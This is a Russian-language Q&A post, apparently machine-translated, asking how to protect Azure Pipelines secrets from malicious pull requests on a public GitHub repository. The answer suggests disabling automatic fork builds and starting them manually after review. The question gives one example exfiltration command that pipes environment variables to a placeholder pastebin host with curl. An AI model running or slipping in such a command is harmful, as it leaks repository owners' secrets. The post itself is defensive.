Выполните проверки безопасности перед включением Azure Pipeline CI в общедоступном PR

У меня публичное репо. Случайные пользователи GitHub могут создавать запросы на вытягивание, и это здорово.

Мой конвейер CI описан в обычном файле в вызываемом репо (мы используем конвейеры Azure).

К сожалению, это означает, что случайный пользователь GitHub может украсть все мои секретные переменные среды, создав PR, где они редактируют и добавьте строку сценария bash примерно так:

      export | curl -XPOST 'http://pastebin-bla/xxxx'

Или запустить произвольный код вообще. Верно?

Как я могу убедиться, что злонамеренный PR не меняет хотя бы некоторые важные файлы?

1 ответ

Как я могу убедиться, что злонамеренный PR не меняет хотя бы некоторые важные файлы?

Боюсь, мы не смогли ограничить PR не меняет хоть какие-то важные файлы.

В качестве обходного пути мы могли бы отключить автоматические сборки вилки и вместо этого использовать комментарии запросов на вытягивание как способ вручную создавать эти вклады, что дает вам возможность просмотреть код перед запуском сборки.

Вы можете проверить документ Подумайте о ручном запуске сборки форка для получения более подробной информации.

Другие вопросы по тегам